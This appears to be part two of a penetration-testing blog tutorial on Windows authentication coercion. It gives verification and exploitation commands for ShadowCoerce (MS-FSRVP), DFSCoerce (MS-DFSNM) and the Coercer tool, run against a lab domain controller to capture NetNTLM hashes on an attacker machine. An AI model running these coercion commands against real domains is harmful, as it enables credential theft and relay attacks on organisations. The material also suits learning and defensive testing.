Hello again everyone! As promised, we continue with the Coerce saga and in this second part we continue commenting on other vulnerable RPCs:
MS-FSRVP
MS-FSRVP is the Remote Procedure Call related to the VSS remote file server protocol. It is used to create copies of file shares on a remote computer and to make it easier for backup applications to perform application-consistent backups and restore data to SMB2 shares.
It should be noted that in order to exploit this vulnerability, the server must have the “File Server VSS Agent Service” feature enabled.
It should be noted that Microsoft released two security patches for correction on June 14, 2022.
Verification
python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'
It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.
Explotation
After verifying that the RPC called “MS-FSRVP” is enabled in the victim, in addition to having compromised a domain user through other means, it will be exploited through a PoC called ShadowCoerce which has the CVE identifier assigned. -2022-30154 .
Likewise, to verify that authentication is forced correctly, we will use the user “bob” with limited privileges in the domain “dc.corp.lab”.
python shadowcoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab
You can see the capture of the NetNTLM hash in the Reply tool.
MS-DFSNM
MS-DFSNM is the Remote Procedure Call related to the Distributed File System (DFS): Namespace Management Protocol. Provides an RPC interface for managing DFS configurations.
Verification
As in the case of MS-EFSR, we will use the crackmapexec tool, through the execution of the “dfscoerce” module and by using the user “bob” with limited privileges in the domain “dc.corp.lab”, to check whether or not the server is vulnerable, but this time with a user from the previously compromised domain:
crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "" -M dfscoerce
It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.
Explotation
After verifying that the domain controller is vulnerable, it will be exploited through a PoC called DFSCoerce which was published in June 2022.
Likewise, to verify that authentication is forced correctly, we will use the user “bob” with limited privileges in the domain “dc.corp.lab”.
python3 dfscoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab
Se
You can see the capture of the NetNTLM hash in the Reply tool.
All for one and one for all
Coercer is a tool written in python which tests multiple methods of performing a "Coerce Authentication", in addition to including all those described above.
It has three execution modes, scan, coerce and fuzz. An example of execution in scan mode would be the following:
coercer scan -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
An example of execution in coerce mode would be the following:
coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
Cheat Sheet
